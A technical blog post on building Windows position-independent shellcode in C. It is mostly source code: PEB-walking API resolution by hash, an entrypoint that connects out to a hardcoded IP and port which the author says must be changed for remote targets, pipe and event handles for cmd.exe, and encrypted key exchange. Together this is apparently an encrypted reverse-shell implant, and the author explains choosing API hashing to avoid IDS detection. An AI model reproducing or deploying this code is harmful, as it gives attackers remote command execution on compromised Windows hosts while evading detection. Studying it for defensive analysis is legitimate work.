Shellcode: A Windows PIC using RSA-2048 key exchange, AES-256, SHA-3

Introduction

This won’t be a tutorial on writing shellcode, although you might glean something useful from the source code when writing your own PIC in C. This is a PIC (Position Independent Code) for the Windows operating system written in C, with some additional assembly code to handle stack limit issues. There are C arrays of the assembly code for x86 here and for x64 here. You must change the IP address from 127.0.0.1 and port number 1234 when testing against remote systems.

The idea of writing Windows shellcode in C is nothing new and has already been demonstrated by a number of people. AFAIK, the first example of this was shown by Didier Stevens in his 2010 article for hakin9 magazine simply called Writing WIN32 Shellcode With a C-compiler.

Nick Harbour also discusses the idea in Writing Shellcode with a C Compiler and Matt Graeber shows how to build a bind shell in his article Writing Optimized Windows Shellcode in C which I’ve borrowed some ideas and code from for my own PIC.

Just this year, a Shellcode Compiler was released which can compile a script into assembly. Of course there are other sources out there such as this, and even a C++ example such as this which takes advantage of the constexpr feature.

Apologies to anyone who has been involved with this subject that I missed.

In March this year, I wrote a 4 part series on some simple interactive “shells” for the windows operating system and the PIC client here can be used with this server which is derived from s4.c discussed in Part 4. The main difference is the PIC client and new server both use SHA-3 and AES-256 for authenticated encryption with some modular arithmetic functions to perform key exchange similar to RSA.

Those of you familiar with shellcode found in generators such as Veil, Metasploit or at online shellcode databases like Exploit Database will know they do not use encrypted communication between two hosts except if using WININET API for TLS connections or a static key with RC4.

I’ll just briefly discuss some things that are good to know when writing your own PIC in C for Windows. I’ll continue to update this as code develops.

  1. C or C++?
  2. C or ASM?
  3. Memory layout
  4. Resolving API
  5. Storing strings
  6. CPU intrinsics
  7. Big number arithmetic
  8. Authenticated Encryption
  9. Todo

C or C++?

Those of you familiar with OOP (Object Oriented Programming) languages will know what a class is and the purpose of properties and methods.

C is a POP (Procedure Oriented Programming) language which doesn’t support classes, but we can emulate them using structures. The reason I’m using C and not C++ to write a PIC has nothing to do with understanding object oriented concepts. I just feel C++ is too close to Java, .NET and other managed code which all hide a lot of low level code from the programmer.

There are new features of C++ that would be invaluable for developing PICs and I encourage anyone to explore its features and not be dissuaded by my decision to use C instead.

One such feature is the constexpr specifier which is incredibly useful for generating hashes of strings at compile time whereas with C, they need to be hardcoded unless linking with some assembly code containing macros.

A structure is used in my own PIC to emulate a class since most of the functions must be resolved at runtime. This structure is passed to each procedure so that it can access what I’ll refer to in future as global memory.
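
To illustrate the idea of a structure standing in for a class, here is a minimal sketch. The names ctx_t, add_fn, add_impl and run are hypothetical and not taken from the PIC; the point is only that a "method" pointer and a "property" live in one structure that is passed explicitly to every call.

```c
#include <stdint.h>

typedef struct ctx_t ctx_t;

/* a "method" takes the context explicitly, like a C++ this pointer */
typedef void (*add_fn)(ctx_t *c, uint32_t n);

struct ctx_t {
  add_fn   add;    /* "method", filled in at runtime */
  uint32_t total;  /* "property" shared between functions */
};

static void add_impl(ctx_t *c, uint32_t n)
{
  c->total += n;
}

/* hypothetical driver: build the context on the stack and use it */
static uint32_t run(void)
{
  ctx_t c;

  c.add   = add_impl;
  c.total = 0;

  c.add(&c, 2);
  c.add(&c, 40);
  return c.total;
}
```

Because nothing here refers to a global variable, the same pattern keeps working when the code is relocated, which is presumably why it suits a PIC.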

C or ASM?

Traditionally, shellcodes have always been written in assembly for the target architecture an operating system runs on. As hardware technology advanced over the last 20 years, so did the complexity of operating systems, and there was also the birth of new languages designed to be more cost effective for a business. These advancements led to fewer and fewer people writing applications in assembly, since the hardware no longer suffered the limitations of early personal computers.

RAM and ROM space are no longer a factor for the majority of computing devices running an operating system. Compilers are efficient at generating code optimized for either speed or size, and high level languages for the most part offer the ability to rapidly develop applications with a chance of fewer bugs. Writing assembly today is largely confined to microcomputing devices such as the Atmel AVR 8-bit and 32-bit Microcontrollers.

As someone that’s programmed with both C and ASM on and off for some years now, there was a time when I thought assembly was the only language for writing shellcode. But the kinds of shellcode I was writing back then were very simple and there wasn’t any consideration for information transmitted between two systems being compromised by a third party. So when I decided to try writing shellcode that used encryption, I knew there would be a lot of code involved and that it would be a nightmare to debug.

So the codes I wrote in the past were small but this PIC can exceed 5KB once extracted from binary which is something I really wouldn’t want to write by hand, although it’s safe to assume an assembly version is likely to be at least 50% smaller.

For a PIC like this using encryption of packets, it’s certainly doable to implement the entire thing in Assembly but I can imagine it being an unpleasant experience. The purpose of the Asmcodes series was essentially to evaluate potential cryptographic primitives for shellcode.

I think it would be wise to develop a PIC in C first before considering an assembly implementation. Once you’ve ironed out any problems, that will make writing assembly much easier.

Memory layout

A general layout of our global memory is required for data and API addresses. API addresses are likely to consume less space than data so I would recommend placing a structure for API at the very beginning of allocated memory.

For this particular code, we use some (but not all) of the 28 API entries, which require 112 bytes on x86 (28 pointers of 4 bytes) and 224 bytes on x64 (28 pointers of 8 bytes). I’ll explain later why some are not currently used; it’s mostly for legacy reasons.

They are resolved by 32-bit hash from the PEB (Process Environment Block) that contains among many other things a list of DLL (Dynamic-link Libraries) loaded into our target process.

We identify the variables that will be required by multiple functions and declare these in a structure I’ve simply called v_tbl. (I may need to revise this as some may think it means virtual table)

Pointers to API addresses are stored in a structure called f_tbl and this is then placed inside another structure with v_tbl to define our global memory.

Anyone that’s ever looked at disassembly for a C++ program will notice that each class object or instance of an object is passed to each class method. I’ve adopted a similar approach in C except you can visibly see the parameter passed to each function in source code.

If you’re familiar with object oriented programming, you can view the v_tbl structure as properties of a class and the f_tbl structure as methods. So you might be asking why not just have all memory space in one area? There’s a reason to separate the two and it’s mainly to do with reducing opcode sizes.

In assembly, it would be ideal to store API at start of structure and data variables at end so that we’re accessing the API with the least amount of bytes.

It may be possible to use a free unused or reserved slot in the TEB (Thread Environment Block) or PEB (Process Environment Block), which we can then access from each function through the FS selector on x86 or the GS selector on x64, but I have not investigated this.

Another issue is the use of stack for storing data. cs32.asm and cs64.asm are required to allocate large blocks of stack memory.

As a general rule, I would advise you to minimize the amount of stack allocated to avoid crashing on some systems. In future I will most likely use the heap for global memory instead of the stack.

Data structure

The v_tbl represents our variables which are for the most part required by more than one function, but not all. Actually, this could be reduced but it’ll do for now.

// shellcode data structure
typedef struct _sc_v_tbl_t {
  spp_blk             blk;
  SOCKET              s;      // socket
  HANDLE              out1;   // CreateNamedPipe
  HANDLE              in0;    // CreatePipe read
  HANDLE              in1;    // CreatePipe write
  HANDLE              out0;   // CreateFile
  // event handles start here
  HANDLE              evt0;   // WSACreateEvent
  HANDLE              evt1;   // CreateEvent for cmd.exe
  PROCESS_INFORMATION pi;
  DWORD               evt_cnt;
  DWORD               secure;
  HCRYPTPROV          hProv;
  spp_tek             tek;
  aes_ctx             ctx;
} v_tbl;

Code structure

The f_tbl represents our ‘function table’ which is just a structure to hold addresses of each API required by all functions. Even if the application space does not use TCP, the PIC will initialize Windows Sockets before attempting to make an outgoing connection.

// api table structure
typedef struct _sc_f_tbl_t {
  union {
    LPVOID api[28];
    struct {
      // kernel32
      CreateNamedPipe_t                pCreateNamedPipe;
      CreatePipe_t                     pCreatePipe;
      CreateFile_t                     pCreateFile;
      WriteFile_t                      pWriteFile;
      ReadFile_t                       pReadFile;
      GetOverlappedResult_t            pGetOverlappedResult;
      CreateProcess_t                  pCreateProcess;
      TerminateProcess_t               pTerminateProcess;
      CreateEvent_t                    pCreateEvent;
      GetTickCount_t                   pGetTickCount;
      GetLastError_t                   pGetLastError;
      CloseHandle_t                    pCloseHandle;
      WaitForMultipleObjects_t         pWaitForMultipleObjects;
      Wow64DisableWow64FsRedirection_t pWow64DisableWow64FsRedirection;
      GetFileSizeEx_t                  pGetFileSizeEx;
      // ws2_32
      socket_t                         psocket;
      connect_t                        pconnect;
      send_t                           psend;
      recv_t                           precv;
      closesocket_t                    pclosesocket;
      ioctlsocket_t                    pioctlsocket;
      WSAEventSelect_t                 pWSAEventSelect;
      WSAEnumNetworkEvents_t           pWSAEnumNetworkEvents;
      WSACreateEvent_t                 pWSACreateEvent;
      WSAStartup_t                     pWSAStartup;
      // advapi32
      CryptAcquireContextA_t           pCryptAcquireContext;
      CryptGenRandom_t                 pCryptGenRandom;
      CryptReleaseContext_t            pCryptReleaseContext;
    };
  };
} f_tbl;
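
The union in f_tbl lets the same memory be filled by index and called by name. The sketch below shows the technique on a toy table; op_t, op_tbl, fill and the three helper functions are hypothetical names used only for illustration, and the anonymous struct assumes C11 or a compiler extension (MSVC and GCC both accept it).

```c
#include <stddef.h>

typedef int (*op_t)(int);

typedef struct {
  union {
    op_t api[3];      /* indexed view, convenient for a resolver loop */
    struct {          /* named view, convenient for callers */
      op_t inc;
      op_t dec;
      op_t neg;
    };
  };
} op_tbl;

static int inc_impl(int v) { return v + 1; }
static int dec_impl(int v) { return v - 1; }
static int neg_impl(int v) { return -v; }

/* fill the table by index, the way a loop over hashes would */
static void fill(op_tbl *t)
{
  op_t   src[3] = { inc_impl, dec_impl, neg_impl };
  size_t i;

  for (i = 0; i < sizeof(t->api) / sizeof(t->api[0]); i++) {
    t->api[i] = src[i];
  }
}
```

After fill(&t), t.inc(1) goes through the same slot as t.api[0]. The order of the named members has to match the order in which the indexed entries are filled, which is why the hash table in the entrypoint follows the same order as f_tbl.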

Both f_tbl and v_tbl are placed in one structure and this represents our global memory.

typedef struct sc_tbl_t {
  f_tbl f; // function table  (code section)
  v_tbl v; // variables table (data section)
} sc_tbl;

Resolving API

A clever and clean way to resolve and invoke an API, which is now part of the Metasploit project, is originally based on this shellcode for Windows, which was used for a CTF by some Spanish dudes in July 2008, well before it was modified and added to the Metasploit repository.

While it’s a neat way to call API, some IDS software now easily recognize this as being shellcode and so I’ve reverted back to the traditional method of calling API from C using code based on GetProcAddressWithHash.h from Matt Graeber’s PIC_Bindshell which can also support resolving 64-bit API.

The main modification is how the hash of a DLL is generated and how forward references are resolved. Instead of using the Unicode string of the DLL in the PEB, the hash is calculated from the DLL name stored in the export directory of the DLL header. In addition to this, if we have a forward reference, a new hash for the DLL and API is generated before attempting to resolve it.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt=0, ofs=0, i, j;
  DWORD                    idx, rva, api_h, dll_h;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll, p;
  LPVOID                   api_adr=0;
  CHAR                     dll_name[64], api_name[128];
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    // nothing to hash if there are no exported names
    if (cnt==0) continue;
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    // calculate hash of DLL string
    dll_h = api_hash(dll);
    
    do {
      // calculate hash of api string
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // add to DLL hash and compare
      if (api_hash(api)+dll_h == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        // is this a forward reference?
        if ((PBYTE)api_adr >= (PBYTE)exp &&
            (PBYTE)api_adr <  (PBYTE)exp + 
            dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
        {
          DEBUG_PRINT("%08X is forwarded to %s", 
              dwHash, api_adr);
              
          // copy DLL name to buffer, leaving room for "DLL" and terminator
          for (i=0, p=api_adr; p[i] != 0 && 
              i < sizeof(dll_name)-5; i++) 
          {
            dll_name[i] = p[i];
            if (p[i] == '.') break;
          }
          dll_name[i+1] = 'D';
          dll_name[i+2] = 'L';
          dll_name[i+3] = 'L';
          dll_name[i+4] = 0;
          // copy API name to buffer
          for(j=0; p[++i] != 0 && 
              j < sizeof(api_name)-1; j++) 
          { 
            api_name[j] = p[i]; 
          }
          api_name[j] = 0;
          // calculate hash for DLL and API
          dll_h = api_hash(dll_name);
          api_h = api_hash(api_name);
          DEBUG_PRINT("hash for %s and %s = %08X", 
              dll_name, api_name, dll_h + api_h);
          // now try again
          api_adr = getapi(dll_h + api_h);
          // if we don't have at this point, bail out.
        }
        break;
      }
    } while (--cnt && api_adr==0);
    if (api_adr!=0) break;
  }
  return api_adr;
}

The initialization code resolves a table of API hashes and stores the addresses in f_tbl, which lives on the stack.

/**F*********************************************
 *
 * entrypoint of PIC
 *
 ************************************************/
#ifdef XALONE
void mainCRTStartup(void)
#else
void entrypoint(void)
#endif
{
  WSADATA            wsa;
  struct sockaddr_in sin;
  sc_tbl             x;
  DWORD              i, cnt;
  int                r;
  char               ws2_32[]={'w','s','2','_','3','2','\0'};
  char               adv_32[]={'a','d','v','a','p','i','3','2','\0'};
  LoadLibrary_t      pLoadLibrary;

  DWORD api_tbl[28] = 
{ // kernel32
  0x9B1D3EA9, 0xE6FA65BF, 0x0BEEEE0C, 0xD7F74F5F,
  0xE0E73F55, 0x5874B33B, 0xB6A0D8D1, 0x09228FC6,
  0xC0F188F0, 0xA7C0D163, 0x2608EFA5, 0x9FEA6E52,
  0xB4682C63, 0xCA1BB2C6, 0x727CC43E,
  // ws2_32
  0x9D920334, 0xB50DF1B2, 0x3DD3116A, 0x3B7B117C,
  0xCE2971AD, 0x424589CE, 0x929726BE, 0x272C063F,
  0x26EF0516, 0xB0E0E991,
  // advapi32
  0x86904799, 0xBD78D522, 0xB635E033 };
  
  // zero initialize memory
  memset ((uint8_t*)&x, 0, sizeof(x));
  
  // load required modules just in case unavailable in PEB
  // get address for LoadlibraryA
  pLoadLibrary=(LoadLibrary_t)getapi(0x7C3B28ED);
  
  // load ws2_32 
  pLoadLibrary(ws2_32);
  
  // load advapi32
  pLoadLibrary(adv_32);
  
  // resolve our api addresses
  for (i=0; i<sizeof(api_tbl)/sizeof(DWORD); i++) {
    x.f.api[i]=getapi(api_tbl[i]);
    if (x.f.api[i] == NULL) {
      DEBUG_PRINT("Critical failure: Unable to resolve API for %08X",
          api_tbl[i]);
      //return;
    }
  }
  
  // initialize winsock
  x.f.pWSAStartup (MAKEWORD(2, 2), &wsa);
  
  // initialize crypto
  x.v.hProv=0;
  
  x.f.pCryptAcquireContext (&x.v.hProv, 
      NULL, NULL, PROV_RSA_AES, 
      CRYPT_VERIFYCONTEXT | CRYPT_SILENT);
      
  // create tcp socket
  x.v.s=x.f.psocket (AF_INET, 
      SOCK_STREAM, IPPROTO_TCP);
      
  // initialize network address, this requires changing before deployment
  sin.sin_port             = HTONS(1234);
  sin.sin_family           = AF_INET;
  sin.sin_addr.S_un.S_addr = 0x0100007F; // 127.0.0.1
  
  // connect to server
  r=x.f.pconnect (x.v.s, 
      (const struct sockaddr*)&sin, sizeof (sin));
  
  if (!r)
  {
    // perform key exchange
    key_xchg(&x);
    // execute dispatcher
    dispatch(&x);
  }
  // close socket
  x.f.pclosesocket (x.v.s);
  // release crypto context
  x.f.pCryptReleaseContext(x.v.hProv, 0);
  
  // cleanup and exit, not used in final code
  //WSACleanup();
  //return 0;
}
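
The constants 0x0100007F and HTONS(1234) above are both in network byte order as seen from a little-endian host. The HTONS macro itself is not shown in this post, so the following is only a sketch of the arithmetic involved; SWAP16 and ipv4_le are hypothetical names.

```c
#include <stdint.h>

/* swap the two bytes of a 16-bit value (host to network order
   on a little-endian CPU such as x86 or x64) */
#define SWAP16(x) \
  ((uint16_t)((((x) & 0xFF) << 8) | (((x) >> 8) & 0xFF)))

/* pack a.b.c.d so the bytes sit in memory as a, b, c, d
   when stored by a little-endian CPU */
static uint32_t ipv4_le(uint8_t a, uint8_t b, uint8_t c, uint8_t d)
{
  return  (uint32_t)a        |
         ((uint32_t)b <<  8) |
         ((uint32_t)c << 16) |
         ((uint32_t)d << 24);
}
```

With these, ipv4_le(127, 0, 0, 1) gives 0x0100007F and SWAP16(1234) gives 0xD204, since 1234 is 0x04D2.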

API hash algorithm

The api_hash algorithm used in the shellcode is exactly the same as that found in Metasploit, except the strings are converted to lowercase before hashing. The following SHA-3 based alternative also works, but it is far slower and delays the shellcode by up to 10 seconds on my system while it resolves API.

// generate sha3-256 hash of dll and api
uint32_t api_hash(char dll[], char api[])
{ 
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX ctx;
  int      i;
  char     c;
  uint8_t  f[64+1]; 
  uint32_t s = 0x9e3779b9UL; // change to something unique
    
  SHA3_Init(&ctx, SHA3_256);         // create 256-bit hash
  SHA3_Update(&ctx, &s, sizeof(s));  // unique secret

  // copy dll converted to lowercase
  for (i=0; dll[i] != 0 && i<sizeof(f)-1; i++) {
    f[i] = (dll[i] | 0x20);
  }
  f[i] = 0;
  SHA3_Update(&ctx, f, i);
  SHA3_Update(&ctx, api, strlen(api));
  SHA3_Final(h.b, &ctx);
  
  // only return the first 32-bits
  return h.w[0];
}

If there’s a way to shorten the time required to resolve hashes using SHA-3, I’ll add it later. Here’s the new getapi function with SHA-3 hashing included, but again it’s too slow.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt=0, ofs=0, idx, rva, dll_h;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll;
  LPVOID                   api_adr=0;
  
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX                 ctx1, ctx2;
  int                      i;
  uint8_t                  f[64+1]; 
  uint32_t                 s = 0x9e3779b9UL;
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    // nothing to hash if there are no exported names
    if (cnt==0) continue;
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    SHA3_Init(&ctx1, SHA3_256);   // create 256-bit hash
    SHA3_Update(&ctx1, &s, sizeof(s));  // unique secret

    // copy dll converted to lowercase
    for (i=0; dll[i] != 0 && i<sizeof(f)-1; i++) {
      f[i] = (dll[i] | 0x20);
    }
    f[i] = 0;
    SHA3_Update(&ctx1, f, i);
  
    do {
      // calculate hash of api string
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // update context with api
      for (i=0; api[i] != 0; i++);
      memcpy ((uint8_t*)&ctx2, (uint8_t*)&ctx1, sizeof(SHA3_CTX));
      SHA3_Update(&ctx2, api, i);
      SHA3_Final(h.b, &ctx2);
      // compare first 32 bits of digest with requested hash
      if (h.w[0] == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        break;
      }
    } while (--cnt && api_adr==0);
    if (api_adr!=0) break;
  }
  return api_adr;
}

Storing strings

Strings must be stored as character arrays otherwise the compiler will automatically store the string and a pointer to it in the data section which we must avoid for a PIC. For example, this PIC requires socket API from ws2_32.dll and crypto API from advapi32.dll but sometimes these are not already loaded in memory. The PIC will load these 2 libraries before trying to resolve any other API at runtime which requires their names be passed to LoadLibrary API.

char ws2_32[]={'w','s','2','_','3','2','\0'};
char adv_32[]={'a','d','v','a','p','i','3','2','\0'};

CPU intrinsics

Even with /Os flag, sometimes the MSVC compiler will think you’re silly and automatically replace FOR loops with memset or memcpy depending on what the loop does. It’s slightly annoying because if I wanted to use memset or memcpy, I’d use them. Since these are external C library functions, I usually have to replace some FOR loops with intrinsics.

You could of course include your own implementation of memset and memcmp functions which might be a better idea but what I normally do is try using the intrinsic directive which should automatically use STOSB/STOSD for memset, MOVSB/MOVSD for memcpy and CMPSB/CMPSD for memcmp.

#pragma intrinsic(memcmp, memcpy, memset)

However, Microsoft has this to say:

The compiler may call the function and not replace the function call with inline instructions, if it will result in better performance.

If the compiler still doesn’t play ball, I’ll define the following.

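// map the C library calls onto the MSVC string intrinsics
#define memcpy(x,y,z) __movsb(x,y,z)
// __movsb copies forward only, so this memmove is only safe when the
// regions don't overlap or the destination is below the source
#define memmove(x,y,z) __movsb(x,y,z)
#define memset(x,y,z) __stosb(x,y,z)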

This usually fixes the issue but when the compiler is stubborn and refuses to substitute memset/memcpy I replace both C functions with either __stosb or __movsb directly.

If all that fails, consider using an older version of MSVC or try mingw. I’m using MSVC 2010 and believe MSVC 2013 and later versions have dropped support for replacing memcmp with REP CMPSB even when /Os is used.

Any other problems might be related to bit rotations used for encryption operations, although any decent compiler will avoid using SHR/SHL/OR to perform a bit rotation. When in doubt, try using _rotl or _rotr. For byte swapping use _bswap (INTEL compiler) or _byteswap_ulong (MSVC).
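
For reference, this is a sketch of the plain C forms that the intrinsics replace. The function names rotl32, rotr32 and bswap32 are my own for illustration; compilers commonly recognize these shift/OR patterns and emit a single ROL, ROR or BSWAP, but that depends on the compiler and flags, so check the disassembly rather than assume it.

```c
#include <stdint.h>

/* rotate left; masking n keeps both shifts within 0..31 */
static uint32_t rotl32(uint32_t v, unsigned n)
{
  n &= 31;
  return (v << n) | (v >> ((32 - n) & 31));
}

/* rotate right */
static uint32_t rotr32(uint32_t v, unsigned n)
{
  n &= 31;
  return (v >> n) | (v << ((32 - n) & 31));
}

/* reverse the byte order of a 32-bit value */
static uint32_t bswap32(uint32_t v)
{
  return  (v >> 24)               |
         ((v >>  8) & 0x0000FF00) |
         ((v <<  8) & 0x00FF0000) |
          (v << 24);
}
```

The extra "& 31" on the second shift avoids shifting a 32-bit value by 32 when n is zero, which is undefined behaviour in C.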

Include the following if switching between the MSVC and INTEL compilers.

#ifdef _MSC_VER
#include <intrin.h>
#else
#include <x86intrin.h>
#endif

Compiler Flags

The only flags I’ve used attempt to reduce code size and omit stack security checks (-GS-).

@echo off
yasm -fwin32 cs32.asm -ocs32.obj
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- aes.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- sha3.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- modexp.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- -DXALONE spz.c
link /order:@order.txt /base:0 spz.obj sha3.obj aes.obj modexp.obj cs32.obj -subsystem:console -nodefaultlib kernel32.lib -stack:0x100000,0x100000
xbin spz.exe .text
del *.obj

Assembly macros for calculating hashes

Assemblers with macro support provide a way to compute hashes of strings at assembly time. The earliest examples of this were demonstrated in viruses computing CRC hashes of API strings.

The following macro, for example, is from the virus writer Vecna and is based on an algorithm originally proposed by LSD-PL in their winasm paper back in 2002.

hash_string macro s
  hash = 0
  len  = 0

  irpc c, <s>
    len = len + 1
  endm
  
  i = 0
  
  irpc c, <s>
    if i ne 0
      if i ne (len-1)
        hash = ((hash shl 7) and 0FFFFFFFFh) or (hash shr (32-7))
        hash = hash xor '&c'
      endif
    endif
    i = i + 1
  endm
endm

An even more clever way to generate MD5 hashes of strings was demonstrated by talented coder drizz. The source of this is too complicated to include here but for those curious, have a look here.

Arithmetic Functions for large integers

The public key cryptography we’re mostly familiar with today uses big number libraries to perform the computations necessary to protect information.

Most sane people will use a well established cryptography library to do all this but since our PIC can’t depend on any libraries we need to implement our own routines.

But it’s not all bad. In comparison to Elliptic Curve and Lattice based encryption, RSA or Diffie Hellman only use modular arithmetic, which needs large keys but the least amount of code. As demonstrated here, a modexp function for x86 can be implemented in 140 bytes!

There’s no Karatsuba or Montgomery multiplication used since our goal is to reduce code as much as possible and that means keeping it simple.

See modexp.c for functions that perform Modular Exponentiation.

There’s a paper published in 2007 that discusses an encrypted payload similar to what I discuss here. An Encrypted Payload Protocol and Target-Side Scripting Engine by Dino Dai Zovi describes a payload using RC4 for symmetric encryption and ElGamal for key agreement however no source code for this was ever released.

Dino states the total size of Modular Exponentiation was approx. 1200 bytes which sounds about right if using bit shifting and addition instead of just addition. Remember: shifting left by 1 is the same as multiplying by 2 or simply adding value to itself. 😉
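
To make the shift and add idea concrete, here is a textbook sketch of modular exponentiation on 64-bit integers. It is not the code from modexp.c, which works on much larger numbers; the function names mulmod and modexp and the restriction that the modulus is non-zero and below 2^63 are assumptions made to keep the example short.

```c
#include <stdint.h>

/* (a * b) mod m using only shifts, additions and subtractions.
   Assumes 0 < m < 2^63 so the additions cannot overflow. */
static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t m)
{
  uint64_t r = 0;

  a %= m;
  while (b) {
    if (b & 1) {        /* add a when the current bit of b is set */
      r += a;
      if (r >= m) r -= m;
    }
    a <<= 1;            /* doubling is the same as adding a to itself */
    if (a >= m) a -= m;
    b >>= 1;
  }
  return r;
}

/* (base ^ exp) mod m by square and multiply */
static uint64_t modexp(uint64_t base, uint64_t exp, uint64_t m)
{
  uint64_t r = 1 % m;   /* handles m == 1 */

  base %= m;
  while (exp) {
    if (exp & 1) r = mulmod(r, base, m);
    base = mulmod(base, base, m);
    exp >>= 1;
  }
  return r;
}
```

For example, modexp(4, 13, 497) returns 445. The same two loops carry over to multi-word integers once the additions, subtractions, shifts and comparisons are replaced with big number versions, which is where most of the code size goes.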

Authenticated Encryption

It would appear that using AEAD (Authenticated Encryption with Associated Data) for packet encryption will eventually become a standard. TLS 1.3 will use only AEAD algorithms and I would expect other protocols to follow suit. Actually, 6 authenticated encryption modes (OCB 2.0, Key Wrap, CCM, EAX, Encrypt-then-MAC (EtM), and GCM) have been standardized in ISO/IEC 19772:2009 although it’s not clear what will be used in future.

The PIC uses an EtM (Encrypt Then MAC) scheme in order to reduce code but I have examined a few of the CAESAR submissions and think Ketje from some of the same authors behind Rijndael and Keccak looks good.

SHA-3 256-bit truncated to 96 bits provides integrity of encrypted packets. The hash is appended to the end of the 16-byte aligned ciphertext before being transmitted.

On the receiving end, we use the same key to generate a MAC and compare it with the 96 bits we’ve received. If they match, we can presume it was sent by a trusted party.

/**F*********************************************
 *
 * Generate MAC of SPP data
 *
 ************************************************/
VOID spp_mac(sc_tbl *x, DWORD inlen, PBYTE out)
{
  SHA3_CTX c;
  BYTE     m[SHA3_256];
  
  SHA3_Init(&c, SHA3_256);                       // initialize
  SHA3_Update(&c, x->v.tek.mkey, SPP_MKEY_LEN);  // add mac key
  SHA3_Update(&c, x->v.blk.buf, inlen);          // add data
  SHA3_Final(m, &c);                             // save
  
  memcpy(out, m, SPP_MAC_LEN);
}
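
When the receiver compares the MAC it computed with the one it received, it is generally safer to compare in constant time so the comparison does not leak how many leading bytes matched. The sketch below shows one common way to do that; mac_equal and MAC_LEN are hypothetical names, and MAC_LEN is assumed to be 12 bytes to match the 96-bit truncation described above. I am not claiming the PIC compares tags this way.

```c
#include <stddef.h>
#include <stdint.h>

#define MAC_LEN 12  /* 96 bits, assumed equal to SPP_MAC_LEN */

/* returns 1 if the two tags match, 0 otherwise;
   always inspects every byte regardless of where they differ */
static int mac_equal(const uint8_t *a, const uint8_t *b, size_t len)
{
  uint8_t diff = 0;
  size_t  i;

  for (i = 0; i < len; i++) {
    diff |= (uint8_t)(a[i] ^ b[i]);
  }
  return diff == 0;
}
```

In an EtM scheme the check happens before any decryption, so a packet with a bad tag can be dropped without the ciphertext ever being processed.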

Todo

The PIC client is susceptible to a MitM (Man In The Middle) attack because it does not verify if the public key sent by a server is from a trusted party. We can solve this by signing the public key or simply embedding one within the PIC before deployment avoiding the need to receive one at all.

Summary

Using C or C++ to write PICs that can run on multiple architectures makes more sense than writing each PIC in pure assembly. However, I would point out that a PIC written in pure assembly can be up to 50-60% smaller, so assembly is not obsolete just yet!

